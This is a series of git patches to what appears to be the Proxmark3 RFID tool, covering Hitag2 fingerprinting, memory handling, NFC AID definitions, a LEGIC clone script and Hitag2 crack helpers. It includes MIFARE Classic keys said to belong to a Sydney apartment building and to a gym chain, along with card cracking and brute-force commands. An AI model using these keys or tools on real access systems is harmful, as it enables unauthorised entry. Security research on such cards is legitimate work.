getHitag2Uid(uint32_t *uid) { @@ -822,6 +842,16 @@ static int CmdLFHitagInfo(const char *Cmd) { // print_hitag2_configuration(uid, 0x02); // print_hitag2_configuration(uid, 0x00); // print_hitag2_configuration(uid, 0x04); + + PrintAndLogEx(INFO, "--- " _CYAN_("Fingerprint")); + const char *s = identify_transponder_hitag2(uid); + if (strlen(s)) { + PrintAndLogEx(SUCCESS, "Found... " _GREEN_("%s"), s); + } else { + PrintAndLogEx(INFO, _RED_("n/a")); + } + + PrintAndLogEx(NORMAL, ""); return PM3_SUCCESS; } From 4b100171a7d122aff83382524d59fbaedb897310 Mon Sep 17 00:00:00 2001 From: Lewys Martin Date: Tue, 21 May 2024 09:57:07 +1000 Subject: [PATCH 007/112] Update mfc_default_keys.dic added keys to my apartment building Signed-off-by: Lewys Martin --- client/dictionaries/mfc_default_keys.dic | 34 ++++++++++++++++++++++++ 1 file changed, 34 insertions(+) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 2b9c6ba49..8c735883d 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -2420,3 +2420,37 @@ EC2B9FD483CA # InsideWash Membership Card - Portugal C18063858BB9 + +# An apartment building in Sydney Olympic Park +13254608D0AB +24A2971BC0B2 +14264709D1AC +25A3981CC1B3 +1527480AD2AD +26A4991DC2B4 +1628490BD3AE +27A59A1EC3B5 +17294A0CD4AF +28A69B1FC4B6 +182A4B0DD5B0 +29A79C20C5B7 +192B4C0ED6B1 +2AA89D21C6B8 +1A2C4D0FD7B2 +2BA99E22C7B9 +1B2D4E10D8B3 +2CAA9F23C8BA +1C2E4F11D9B4 +2DABA024C9BB +1D2F5012DAB5 +2EACA125CABC +1E305113DBB6 +2FADA226CBBD +1F315214DCB7 +30AEA327CCBE +20325315DDB8 +31AFA428CDBF +21335416DEB9 +32B0A529CEC0 +22345517DFBA +33B1A62ACFC1 From b9a583cdb51bb3550c325e6928d23c314eb84b1d Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Tue, 21 May 2024 18:31:51 +0200 Subject: [PATCH 008/112] swapped out to use bigbuff memory allocation and also show an empty message --- CHANGELOG.md | 3 ++- armsrc/spiffs.c | 18 +++++++++++++----- 2 files changed, 15 insertions(+), 6 deletions(-) diff --git a/CHANGELOG.md b/CHANGELOG.md index a4710aeae..ff3639ea6 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,7 +3,8 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] -- Change `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) +- Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) +- Changed `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) - Added `lf hitag reader` - act as a Hitag2 reader (@iceman1001) - Fixed `lf hitag crack2` - now works. (@iceman1001) - Fixed wrong use of free() in desfire crypto on arm src, thanks @jlitewski! (@iceman1001) diff --git a/armsrc/spiffs.c b/armsrc/spiffs.c index 3154bfc0f..fbbf95672 100644 --- a/armsrc/spiffs.c +++ b/armsrc/spiffs.c @@ -639,24 +639,32 @@ void rdv40_spiffs_safe_print_tree(void) { struct spiffs_dirent e; struct spiffs_dirent *pe = &e; + char *resolvedlink = (char *)BigBuf_calloc(11 + SPIFFS_OBJ_NAME_LEN); + char *linkdest = (char *)BigBuf_calloc(SPIFFS_OBJ_NAME_LEN); + bool printed = false; + SPIFFS_opendir(&fs, "/", &d); while ((pe = SPIFFS_readdir(&d, pe))) { - char resolvedlink[11 + SPIFFS_OBJ_NAME_LEN]; + memset(resolvedlink, 0, sizeof(resolvedlink)); + if (rdv40_spiffs_is_symlink((const char *)pe->name)) { - char linkdest[SPIFFS_OBJ_NAME_LEN]; + read_from_spiffs((char *)pe->name, (uint8_t *)linkdest, SPIFFS_OBJ_NAME_LEN); sprintf(resolvedlink, "(.lnk) --> %s", linkdest); // Kind of stripping the .lnk extension strtok((char *)pe->name, "."); - } else { - memset(resolvedlink, 0, sizeof(resolvedlink)); } - Dbprintf("[%04x]\t " _YELLOW_("%i") " B |-- %s%s", pe->obj_id, pe->size, pe->name, resolvedlink); + Dbprintf("[%04x] " _YELLOW_("%5i") " B |-- %s%s", pe->obj_id, pe->size, pe->name, resolvedlink); + printed = true; + } + if (printed == false) { + DbpString(""); } SPIFFS_closedir(&d); rdv40_spiffs_lazy_mount_rollback(changed); + BigBuf_free(); } void rdv40_spiffs_safe_wipe(void) { From 7570f4a87c338bf6af1be2e51b3ec09508faaaee Mon Sep 17 00:00:00 2001 From: kormax <3392860+kormax@users.noreply.github.com> Date: Tue, 21 May 2024 22:44:53 +0300 Subject: [PATCH 009/112] add new AID & ECP definitions --- client/resources/aidlist.json | 44 +++++++++- client/resources/ecp_taxonomy.json | 126 +++++++++++++++++++++++++++++ client/resources/ecplist.json | 5 ++ 3 files changed, 173 insertions(+), 2 deletions(-) create mode 100644 client/resources/ecp_taxonomy.json diff --git a/client/resources/aidlist.json b/client/resources/aidlist.json index a4a58d9f2..9b6d58317 100644 --- a/client/resources/aidlist.json +++ b/client/resources/aidlist.json @@ -2284,7 +2284,7 @@ "Vendor": "Apple", "Country": "", "Name": "Apple Home Key Framework", - "Description": "Home Key configuration applet. Selected after a first transaction on a newely-invited device (allegedly for mailbox sync/attestation exchange)", + "Description": "Home Key configuration applet. Used for attestation exchange", "Type": "" }, { @@ -2292,7 +2292,39 @@ "Vendor": "Apple", "Country": "", "Name": "Apple Home Key", - "Description": "NFC Home Key for select HomeKit-compatible locks", + "Description": "NFC Home Key for select HomeKit-compatible locks based on Apple UnifiedAccess protocol", + "Type": "access" + }, + { + "AID": "A0000008580202", + "Vendor": "Apple", + "Country": "", + "Name": "Apple Access Key Framework", + "Description": "Access Key configuration applet. Used for attestation exchange", + "Type": "" + }, + { + "AID": "A0000008580201", + "Vendor": "Apple", + "Country": "", + "Name": "Apple Access Key", + "Description": "NFC Access Key for commercial properties based on Apple UnifiedAccess protocol", + "Type": "access" + }, + { + "AID": "A000000909ACCE5502", + "Vendor": "Connectivity Standards Alliance (CSA)", + "Country": "", + "Name": "Aliro Framework", + "Description": "Used during key provisioning, configuration, attestation exchange", + "Type": "" + }, + { + "AID": "A000000909ACCE5501", + "Vendor": "Connectivity Standards Alliance (CSA)", + "Country": "", + "Name": "Aliro", + "Description": "", "Type": "access" }, { @@ -2430,5 +2462,13 @@ "Name": "CEPAS", "Description": "Transit and e-money card used in Singapore", "Type": "transport" + }, + { + "AID": "A0000004040125", + "Vendor": "Ile-de-France Mobilites", + "Country": "France", + "Name": "Navigo", + "Description": "CALYPSO-based transit card", + "Type": "transport" } ] diff --git a/client/resources/ecp_taxonomy.json b/client/resources/ecp_taxonomy.json new file mode 100644 index 000000000..77ac67d07 --- /dev/null +++ b/client/resources/ecp_taxonomy.json @@ -0,0 +1,126 @@ +{ + "versions": { + "01": { + "tci": { + "000000": { + "id": "tci-vas-or-pay", + "name": "VAS or payment", + "description": "Used when a reader needs a pass or a payment card. Sometimes called VAS over Payment" + }, + "000001": { + "id": "tci-vas-and-pay", + "name": "VAS and payment", + "description": "Also called single tap mode. Allows reading multiple passes with different ids in one tap" + }, + "000002": { + "id": "tci-vas-only", + "name": "VAS only", + "description": "Used when a reader requests passes only" + }, + "000003": { + "id": "tci-pay-only", + "name": "VAS only", + "description": "Used when a reader requests payment cards only. Also disables express mode for chinese transit cards" + }, + "cf0000": { + "id": "tci-ignore", + "name": "Ignore", + "description": "iPhones before IOS17 emit this frame so that other apple devices don't react to the field" + } + } + }, + + "02": { + "types": { + "01": { + "id": "terminal-type-transit", + "name": "Transit", + "description": "Used by express-mode enabled transit terminals", + + "subtypes": { + "00": { + "id": "terminal-subtype-default", + "name": "Default subtype", + "description": "", + + "tci": { + "030400": { + "id": "tci-hop-fastpass", + "name": "HOP Fastpass", + "description": "" + }, + "030002": { + "id": "tci-transit-for-london", + "name": "TFL", + "description": "First publically known TCI, found by Proxmark community member" + }, + "030001": { + "id": "tci-wmata", + "name": "SmartTrip", + "description": "" + }, + "030005": { + "id": "tci-la-tapp", + "name": "LA Tap", + "description": "" + }, + "030007": { + "id": "tci-clipper", + "name": "Clipper", + "description": "" + }, + "03095a": { + "id": "tci-navigo", + "name": "Navigo", + "description": "" + } + }, + + "data": { + "length": 5, + "name": "Fallback EMV payment networks", + "description": "Bit mask of allowed EMV open loop payment cards. First byte is responsible for most popular payment networks" + } + } + } + }, + "02": { + "id": "terminal-type-access", + "name": "Access", + "description": "Used by express-mode enabled access and key readers", + + "subtypes": { + "00": { + "id": "terminal-subtype-venue", + "name": "Venue", + "description": "Used by following venues: Offices, Parks, Universities", + "tci": { + "no-info-add-if-found": "" + } + }, + "06": { + "id": "terminal-subtype-home-key", + "name": "Home Key", + "description": "Used by home key", + "tci": { + "021100": { + "id": "tci-homekey", + "name": "Home Key", + "description": "" + } + } + }, + "09": { + "id": "terminal-subtype-automotive-pairing", + "name": "Automotive", + "description": "Used by cars for access and setup", + "tci": { + "no-info-add-if-found": "" + } + } + } + } + } + } + } +} diff --git a/client/resources/ecplist.json b/client/resources/ecplist.json index 27db827f1..c6ce12b52 100644 --- a/client/resources/ecplist.json +++ b/client/resources/ecplist.json @@ -55,6 +55,11 @@ "name": "Transit: Clipper", "description": "" }, + { + "value": "6a02c8010003095a0000000000", + "name": "Transit: Navigo", + "description": "" + }, { "value": "6a02c3020002ffff", From 5a133e39bd0c9a7d8dd58700205a8337460009c6 Mon Sep 17 00:00:00 2001 From: ry4000 <154689120+ry4000@users.noreply.github.com> Date: Wed, 22 May 2024 10:05:43 +1000 Subject: [PATCH 010/112] Added Jett's 24 Hour Fitness Updated gym list; made some minor spelling corrections. Jett's 24 Hour Fitness might also access Zap Fitness gym tags; however, I am unable to test that just yet as I have been unable to buy any of their cancelled credentials on second-hand marketplaces. Signed-off-by: ry4000 <154689120+ry4000@users.noreply.github.com> --- client/dictionaries/mfc_default_keys.dic | 12 ++++++++---- 1 file changed, 8 insertions(+), 4 deletions(-) diff --git a/client/dictionaries/mfc_default_keys.dic b/client/dictionaries/mfc_default_keys.dic index 2b9c6ba49..c8b1d4372 100644 --- a/client/dictionaries/mfc_default_keys.dic +++ b/client/dictionaries/mfc_default_keys.dic @@ -307,7 +307,7 @@ E3429281EFC1 # EPI Envisionte AAFB06045877 # -# gym +# Gyms / Fitness Clubs / Health Clubs / Wellness Centres # # Fysiken A 3E65E4FB65B3 @@ -318,8 +318,8 @@ AAFB06045877 # # https://mattionline.de/fitnessstudio-armband-reverse-engineering/ # https://mattionline.de/milazycracker/ -# gym wistband A, same as Fysiken A -# gym wistband B +# Gym Wristband A - Same as Fysiken A +# Gym Wristband B 81CC25EBBB6A 195DC63DB3A3 # @@ -330,9 +330,13 @@ A05DBD98E0FC AA4DDA458EBB EAB8066C7479 # -# Nordic Wellness A, same as Fysiken A +# Nordic Wellness A - Same as Fysiken A # Nordic Wellness B E5519E1CC92B +# +# Jett's 24 Hour Fitness S0 KA/B +# 049979614077 +# 829338771705 # # Hotel KeyCard D3B595E9DD63 From 4babe8f012be831b0da9871416508b206e19b62d Mon Sep 17 00:00:00 2001 From: Uli Heilmeier Date: Sat, 25 May 2024 16:14:01 +0200 Subject: [PATCH 011/112] fix: hf_legic_clone.lua script Fixes: #2236 --- client/luascripts/hf_legic_clone.lua | 21 ++++++++++----------- 1 file changed, 10 insertions(+), 11 deletions(-) diff --git a/client/luascripts/hf_legic_clone.lua b/client/luascripts/hf_legic_clone.lua index d9a86dc81..01d44ebe6 100644 --- a/client/luascripts/hf_legic_clone.lua +++ b/client/luascripts/hf_legic_clone.lua @@ -167,12 +167,11 @@ local function help() print(ansicolors.cyan..'Example usage'..ansicolors.reset) print(example) end --- read LEGIC data -local function readlegicdata(offset, len, iv) +-- read LEGIC info +local function readlegicinfo() -- Read data - local d0 = ('%04X%04X%02X'):format(offset, len, iv) - local c = Command:newNG{cmd = cmds.CMD_HF_LEGIC_READER, data = d0} - local result, err = c:sendNG() + local c = Command:newNG{cmd = cmds.CMD_HF_LEGIC_INFO, data = nil} + local result, err = c:sendNG(false, 2000) if not result then return oops(err) end -- result is a packed data structure, data starts at offset 33 return result @@ -404,15 +403,15 @@ local function writeToTag(plainBytes) return end - readbytes = readlegicdata(0, 4, 0x55) + readbytes = readlegicinfo() -- gather MCD & MSN from new Tag - this must be enterd manually print("\nthese are the MCD MSN0 MSN1 MSN2 from the Tag that has being read:") - -- readbytes is a usbcommandOLD package, hence 32 bytes offset until data. - plainBytes[1] = ('%02x'):format(readbytes:byte(33)) - plainBytes[2] = ('%02x'):format(readbytes:byte(34)) - plainBytes[3] = ('%02x'):format(readbytes:byte(35)) - plainBytes[4] = ('%02x'):format(readbytes:byte(36)) + -- readbytes is a table with uid data as hex string in Data key + plainBytes[1] = readbytes.Data:sub(1,2) + plainBytes[2] = readbytes.Data:sub(3,4) + plainBytes[3] = readbytes.Data:sub(5,6) + plainBytes[4] = readbytes.Data:sub(7,8) MCD = plainBytes[1] MSN0 = plainBytes[2] From d3d701f53886052fc3683b7dbf2518bafb981706 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 27 May 2024 15:08:49 +0200 Subject: [PATCH 012/112] the generation of NrAr is used in the regression tests. I readded the old way and if you call the hitag2_gen_nRaR.py with five params, you get the nice commands instead --- CHANGELOG.md | 1 + tools/hitag2crack/hitag2_gen_nRaR.py | 10 ++++++++++ tools/pm3_tests.sh | 1 + 3 files changed, 12 insertions(+) diff --git a/CHANGELOG.md b/CHANGELOG.md index ff3639ea6..1b1aa773a 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -3,6 +3,7 @@ All notable changes to this project will be documented in this file. This project uses the changelog in accordance with [keepchangelog](http://keepachangelog.com/). Please use this to write notable changes, which is not the same as git commit log... ## [unreleased][unreleased] +- Fixed the pm3 regressiontests for Hitag2Crack (@iceman1001) - Changed `mem spiffs tree` - adapted to bigbuff and show if empty (@iceman1001) - Changed `lf hitag info` - now tries to identify different key fob emulators (@iceman1001) - Added `lf hitag reader` - act as a Hitag2 reader (@iceman1001) diff --git a/tools/hitag2crack/hitag2_gen_nRaR.py b/tools/hitag2crack/hitag2_gen_nRaR.py index 68256b61e..7ddc95d10 100755 --- a/tools/hitag2crack/hitag2_gen_nRaR.py +++ b/tools/hitag2crack/hitag2_gen_nRaR.py @@ -109,7 +109,17 @@ def hitag2(state, length=48): if __name__ == "__main__": import sys + if len(sys.argv) == 4: + key = int(sys.argv[1], 16) + uid = int(sys.argv[2], 16) + n = int(sys.argv[3]) + for i in range(n): + nonce = random.randrange(2**32) + state = hitag2_init(key, uid, nonce) + print('%08X %08X' % (nonce, hitag2(state, 32) ^ 0xffffffff)) + + elif len(sys.argv) == 5: key = int(sys.argv[1], 16) uid = int(sys.argv[2], 16) n = int(sys.argv[3]) diff --git a/tools/pm3_tests.sh b/tools/pm3_tests.sh index 5c7ee8d75..a35512df4 100755 --- a/tools/pm3_tests.sh +++ b/tools/pm3_tests.sh @@ -256,6 +256,7 @@ while true; do if ! CheckFileExist "MFP dictionary exists" "$DICPATH/mfp_default_keys.dic"; then break; fi if ! CheckFileExist "MFULC dictionary exists" "$DICPATH/mfulc_default_keys.dic"; then break; fi if ! CheckFileExist "T55XX dictionary exists" "$DICPATH/t55xx_default_pwds.dic"; then break; fi + if ! CheckFileExist "HITAG2 dictionary exists" "$DICPATH/ht2_default.dic"; then break; fi echo -e "\n${C_BLUE}Testing tools:${C_NC}" if ! CheckExecute "xorcheck test" "tools/xorcheck.py 04 00 80 64 ba" "final LRC XOR byte value: 5A"; then break; fi From 8d1e9c1f5dcbc5b4687c247fe654b3f63ea44649 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 27 May 2024 15:19:22 +0200 Subject: [PATCH 013/112] adapt response struct for hitag2 so be large enough to handle 256bytes for cryptostream --- include/hitag.h | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/include/hitag.h b/include/hitag.h index 06a8de9cf..0f70d43fa 100644 --- a/include/hitag.h +++ b/include/hitag.h @@ -59,7 +59,7 @@ typedef struct { typedef struct { int status; - uint8_t data[48]; + uint8_t data[256]; } PACKED lf_hitag_crack_response_t; //--------------------------------------------------------- From 369db7c9d7fa0459fcc184efb4a09bb56bcb4bd3 Mon Sep 17 00:00:00 2001 From: iceman1001 Date: Mon, 27 May 2024 20:29:02 +0200 Subject: [PATCH 014/112] style --- armsrc/dbprint.c | 5 ++- armsrc/em4x50.c | 2 +- armsrc/em4x70.c | 76 ++++++++++++++++----------------- armsrc/hitag2_crack.c | 10 ++--- armsrc/hitagS.c | 2 +- armsrc/lfsampling.c | 2 +- client/src/cmddata.c | 4 +- client/src/cmdlfem4x70.c | 10 ++--- client/src/cmdlfhitag.c | 10 ++--- client/src/cmdtrace.c | 2 +- client/src/graph.c | 8 ++-- client/src/pm3line_vocabulary.h | 2 + doc/commands.json | 45 ++++++++++++++++--- doc/commands.md | 2 + 14 files changed, 109 insertions(+), 71 deletions(-) diff --git a/armsrc/dbprint.c b/armsrc/dbprint.c index 4c58ccbdd..903adf872 100644 --- a/armsrc/dbprint.c +++ b/armsrc/dbprint.c @@ -101,9 +101,10 @@ void Dbhexdump(int len, const uint8_t *d, bool bAsci) { d += 16; } #endif -}void print_result(const char *name, const uint8_t *d, size_t +} +void print_result(const char *name, const uint8_t *d, size_t - n) { + n) { const uint8_t *p = d; uint16_t tmp = n & 0xFFF0; diff --git a/armsrc/em4x50.c b/armsrc/em4x50.c index 9d4d2648d..952c39a30 100644 --- a/armsrc/em4x50.c +++ b/armsrc/em4x50.c @@ -1257,7 +1257,7 @@ static int em4x50_sim_read_bit(void) { // wait 16 cycles to make sure there is no field when reading a "0" bit uint32_t waitval = GetTicks(); - while(GetTicks() - waitval < EM4X50_T_TAG_QUARTER_PERIOD * CYCLES2TICKS); + while (GetTicks() - waitval < EM4X50_T_TAG_QUARTER_PERIOD * CYCLES2TICKS); while (cycles < EM4X50_T_TAG_THREE_QUARTER_PERIOD) { diff --git a/armsrc/em4x70.c b/armsrc/em4x70.c index 6f962fe40..2f92dfbf1 100644 --- a/armsrc/em4x70.c +++ b/armsrc/em4x70.c @@ -32,47 +32,47 @@ static bool command_parity = true; #if 1 // Calculation of ticks for timing functions - // Conversion from Ticks to RF periods - // 1 us = 1.5 ticks - // 1RF Period = 8us = 12 Ticks - #define TICKS_PER_FC 12 +// Conversion from Ticks to RF periods +// 1 us = 1.5 ticks +// 1RF Period = 8us = 12 Ticks +#define TICKS_PER_FC 12 - // Chip timing from datasheet - // Converted into Ticks for timing functions - #define EM4X70_T_TAG_QUARTER_PERIOD (8 * TICKS_PER_FC) - #define EM4X70_T_TAG_HALF_PERIOD (16 * TICKS_PER_FC) - #define EM4X70_T_TAG_THREE_QUARTER_PERIOD (24 * TICKS_PER_FC) - #define EM4X70_T_TAG_FULL_PERIOD (32 * TICKS_PER_FC) // 1 Bit Period - #define EM4X70_T_TAG_TWA (128 * TICKS_PER_FC) // Write Access Time - #define EM4X70_T_TAG_DIV (224 * TICKS_PER_FC) // Divergency Time - #define EM4X70_T_TAG_AUTH (4224 * TICKS_PER_FC) // Authentication Time - #define EM4X70_T_TAG_WEE (3072 * TICKS_PER_FC) // EEPROM write Time - #define EM4X70_T_TAG_TWALB (672 * TICKS_PER_FC) // Write Access Time of Lock Bits - #define EM4X70_T_TAG_BITMOD (4 * TICKS_PER_FC) // Initial time to stop modulation when sending 0 - #define EM4X70_T_TAG_TOLERANCE (8 * TICKS_PER_FC) // Tolerance in RF periods for receive/LIW +// Chip timing from datasheet +// Converted into Ticks for timing functions +#define EM4X70_T_TAG_QUARTER_PERIOD (8 * TICKS_PER_FC) +#define EM4X70_T_TAG_HALF_PERIOD (16 * TICKS_PER_FC) +#define EM4X70_T_TAG_THREE_QUARTER_PERIOD (24 * TICKS_PER_FC) +#define EM4X70_T_TAG_FULL_PERIOD (32 * TICKS_PER_FC) // 1 Bit Period +#define EM4X70_T_TAG_TWA (128 * TICKS_PER_FC) // Write Access Time +#define EM4X70_T_TAG_DIV (224 * TICKS_PER_FC) // Divergency Time +#define EM4X70_T_TAG_AUTH (4224 * TICKS_PER_FC) // Authentication Time +#define EM4X70_T_TAG_WEE (3072 * TICKS_PER_FC) // EEPROM write Time +#define EM4X70_T_TAG_TWALB (672 * TICKS_PER_FC) // Write Access Time of Lock Bits +#define EM4X70_T_TAG_BITMOD (4 * TICKS_PER_FC) // Initial time to stop modulation when sending 0 +#define EM4X70_T_TAG_TOLERANCE (8 * TICKS_PER_FC) // Tolerance in RF periods for receive/LIW - #define EM4X70_T_TAG_TIMEOUT (4 * EM4X70_T_TAG_FULL_PERIOD) // Timeout if we ever get a pulse longer than this - #define EM4X70_T_WAITING_FOR_LIW 50 // Pulses to wait for listen window - #define EM4X70_T_READ_HEADER_LEN 16 // Read header length (16 bit periods) +#define EM4X70_T_TAG_TIMEOUT (4 * EM4X70_T_TAG_FULL_PERIOD) // Timeout if we ever get a pulse longer than this +#define EM4X70_T_WAITING_FOR_LIW 50 // Pulses to wait for listen window +#define EM4X70_T_READ_HEADER_LEN 16 // Read header length (16 bit periods) - #define EM4X70_COMMAND_RETRIES 5 // Attempts to send/read command - #define EM4X70_MAX_RECEIVE_LENGTH 96 // Maximum bits to expect from any command +#define EM4X70_COMMAND_RETRIES 5 // Attempts to send/read command +#define EM4X70_MAX_RECEIVE_LENGTH 96 // Maximum bits to expect from any command #endif // Calculation of ticks for timing functions #if 1 // EM4x70 Command IDs - /** - * These IDs are from the EM4170 datasheet. - * Some versions of the chip require a - * (even) parity bit, others do not. - * The command is thus stored only in the - * three least significant bits (mask 0x07). - */ - #define EM4X70_COMMAND_ID 0x01 - #define EM4X70_COMMAND_UM1 0x02 - #define EM4X70_COMMAND_AUTH 0x03 - #define EM4X70_COMMAND_PIN 0x04 - #define EM4X70_COMMAND_WRITE 0x05 - #define EM4X70_COMMAND_UM2 0x07 +/** + * These IDs are from the EM4170 datasheet. + * Some versions of the chip require a + * (even) parity bit, others do not. + * The command is thus stored only in the + * three least significant bits (mask 0x07). + */ +#define EM4X70_COMMAND_ID 0x01 +#define EM4X70_COMMAND_UM1 0x02 +#define EM4X70_COMMAND_AUTH 0x03 +#define EM4X70_COMMAND_PIN 0x04 +#define EM4X70_COMMAND_WRITE 0x05 +#define EM4X70_COMMAND_UM2 0x07 #endif // EM4x70 Command IDs // Constants used to determine high/low state of signal @@ -309,7 +309,7 @@ static bool check_ack(void) { // ACK 64 + 64 // NAK 64 + 48 if (check_pulse_length(get_pulse_length(FALLING_EDGE), 2 * EM4X70_T_TAG_FULL_PERIOD) && - check_pulse_length(get_pulse_length(FALLING_EDGE), 2 * EM4X70_T_TAG_FULL_PERIOD)) { + check_pulse_length(get_pulse_length(FALLING_EDGE), 2 * EM4X70_T_TAG_FULL_PERIOD)) { // ACK return true; } @@ -549,8 +549,8 @@ static bool find_listen_window(bool command) { return false; } -// *bits == array of bytes, each byte storing a single bit. -// *out == array of bytes, storing converted bits --> bytes. +// *bits == array of bytes, each byte storing a single bit. +// *out == array of bytes, storing converted bits --> bytes. // // [in, bcount(count_of_bits) ] const uint8_t *bits // [out, bcount(count_of_bits/8)] uint8_t *out diff --git a/armsrc/hitag2_crack.c b/armsrc/hitag2_crack.c index ed71e8ad5..e5dea8a64 100644 --- a/armsrc/hitag2_crack.c +++ b/armsrc/hitag2_crack.c @@ -380,7 +380,7 @@ void ht2_crack2(uint8_t *nrar_hex) { // We got 42 bits of keystream in c2->keybits. // using the 40 bits of keystream in keybits, sending commands with ever - // increasing lengths to acquire 2048 bits of key stream. + // increasing lengths to acquire 2048 bits of key stream. int kslen = 40; int res = PM3_SUCCESS; @@ -409,17 +409,17 @@ void ht2_crack2(uint8_t *nrar_hex) { uint8_t resp[4] = {0}; res = ht2_tx_rx(c2->e_ext_cmd, kslen, resp, &n, true, false); if (res != PM3_SUCCESS) { - Dbprintf("tx/rx failed, got %zu (res... %i)", n, res); + Dbprintf("tx/rx failed, got %zu (res... %i)", n, res); break; } - // convert response to binarray + // convert response to binarray hex2binarray_n((char *)e_response, (char *)resp, 4); // recover keystream from encrypted response hitag2crack_xor(c2->keybits + kslen, e_response, c2->uid, 32); - // extented with 30 bits or 3 * 10 read_p0_cmds + // extented with 30 bits or 3 * 10 read_p0_cmds hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10); kslen += 10; hitag2crack_xor(c2->e_ext_cmd + kslen, read_p0_cmd, c2->keybits + kslen, 10); @@ -437,5 +437,5 @@ void ht2_crack2(uint8_t *nrar_hex) { reply_ng(CMD_LF_HITAG2_CRACK_2, res, (uint8_t *)packet, sizeof(lf_hitag_crack_response_t)); BigBuf_free(); - return; + return; } diff --git a/armsrc/hitagS.c b/armsrc/hitagS.c index f80c350d0..c17756d05 100644 --- a/armsrc/hitagS.c +++ b/armsrc/hitagS.c @@ -1090,7 +1090,7 @@ static void hitagS_receive_frame(uint8_t *rx, size_t sizeofrx, size_t *rxlen, ui // Dbprintf("RX0 %i:%02X.. err:%i resptime:%i", *rxlen, rx[0], errorCount, *resptime); } -static void sendReceiveHitagS( const uint8_t *tx, size_t txlen, uint8_t *rx, size_t sizeofrx, size_t *prxbits, int t_wait, bool ledcontrol, bool ac_seq) { +static void sendReceiveHitagS(const uint8_t *tx, size_t txlen, uint8_t *rx, size_t sizeofrx, size_t *prxbits, int t_wait, bool ledcontrol, bool ac_seq) { LogTraceBits(tx, txlen, HITAG_T_WAIT_2, HITAG_T_WAIT_2, true); diff --git a/armsrc/lfsampling.c b/armsrc/lfsampling.c index 8325bbed1..88787b4e1 100644 --- a/armsrc/lfsampling.c +++ b/armsrc/lfsampling.c @@ -538,7 +538,7 @@ int ReadLF_realtime(bool reader_field) { return_value = async_usb_write_stop(); -out: +out: LED_D_OFF(); // DoAcquisition() end diff --git a/client/src/cmddata.c b/client/src/cmddata.c index 14144c77c..1ce0aadef 100644 --- a/client/src/cmddata.c +++ b/client/src/cmddata.c @@ -3683,7 +3683,7 @@ static int CmdTestSaveState8(const char *Cmd) { size_t length = (rand() % 256); PrintAndLogEx(DEBUG, "Testing with length = %llu", length); - uint8_t *srcBuffer = (uint8_t*)calloc(length + 1, sizeof(uint8_t)); + uint8_t *srcBuffer = (uint8_t *)calloc(length + 1, sizeof(uint8_t)); //Set up the source buffer with random data for (int i = 0; i < length; i++) { @@ -3706,7 +3706,7 @@ static int CmdTestSaveState8(const char *Cmd) { } else { PrintAndLogEx(DEBUG, _GREEN_("Lengths match!") "\n"); } - + for (size_t i = 0; i < returnedLength; i++) { if (srcBuffer[i] != destBuffer[i]) { PrintAndLogEx(FAILED, "Buffers don't match at index %lu!, Expected %i, got %i", i, srcBuffer[i], destBuffer[i]); diff --git a/client/src/cmdlfem4x70.c b/client/src/cmdlfem4x70.c index 181dbc734..cffac044d 100644 --- a/client/src/cmdlfem4x70.c +++ b/client/src/cmdlfem4x70.c @@ -545,7 +545,7 @@ static int CmdEM4x70Brute(const char *Cmd) { "lf em 4x70 brute -b 9 --rnd 45F54ADA252AAC --frn 4866BB70 --> bruteforcing key bits k95...k80 (pm3 test key)\n" "lf em 4x70 brute -b 8 --rnd 3FFE1FB6CC513F --frn F355F1A0 --> bruteforcing key bits k79...k64 (research paper key)\n" "lf em 4x70 brute -b 7 --rnd 7D5167003571F8 --frn 982DBCC0 --> bruteforcing key bits k63...k48 (autorecovery test key)\n" - ); + ); void *argtable[] = { arg_param_begin, arg_lit0(NULL, "par", "Add parity bit when sending commands"), @@ -1505,22 +1505,22 @@ static int CmdEM4x70Calc(const char *Cmd) { opts.key.k[ 0], opts.key.k[ 1], opts.key.k[ 2], opts.key.k[ 3], opts.key.k[ 4], opts.key.k[ 5], opts.key.k[ 6], opts.key.k[ 7], opts.key.k[ 8], opts.key.k[ 9], opts.key.k[10], opts.key.k[11] - ); + ); snprintf( rnd_string, 15, "%02X%02X%02X%02X%02X%02X%02X", opts.rn.rn[0], opts.rn.rn[1], opts.rn.rn[2], opts.rn.rn[3], opts.rn.rn[4], opts.rn.rn[5], opts.rn.rn[6] - ); + ); snprintf( frn_string, 9, "%02X%02X%02X%02X", data.frn.frn[0], data.frn.frn[1], data.frn.frn[2], data.frn.frn[3] - ); + ); snprintf( grn_string, 7, "%02X%02X%02X", data.grn.grn[0], data.grn.grn[1], data.grn.grn[2] - ); + ); } PrintAndLogEx(SUCCESS, "KEY: %s RND: %s FRN: " _GREEN_("%s") " GRN: " _GREEN_("%s"), key_string, rnd_string, frn_string, grn_string); return PM3_SUCCESS; diff --git a/client/src/cmdlfhitag.c b/client/src/cmdlfhitag.c index 1d79fb68f..1705bf50f 100644 --- a/client/src/cmdlfhitag.c +++ b/client/src/cmdlfhitag.c @@ -766,7 +766,7 @@ void annotateHitag2(char *exp, size_t size, const uint8_t *cmd, uint8_t cmdsize, void annotateHitagS(char *exp, size_t size, const uint8_t *cmd, uint8_t cmdsize, bool is_response) { } -static const char* identify_transponder_hitag2(uint32_t uid) { +static const char *identify_transponder_hitag2(uint32_t uid) { switch (uid) { case 0x53505910: @@ -858,10 +858,10 @@ static int CmdLFHitagInfo(const char *Cmd) { static int CmdLFHitagReader(const char *Cmd) { CLIParserContext *ctx; CLIParserInit(&ctx, "lf hitag reader", - "Act as a Hitag2 reader. Look for Hitag2 tags until Enter or the pm3 button is pressed\n", - "lf hitag reader\n" - "lf hitag reader -@ -> Continuous mode" - ); + "Act as a Hitag2 reader. Look for 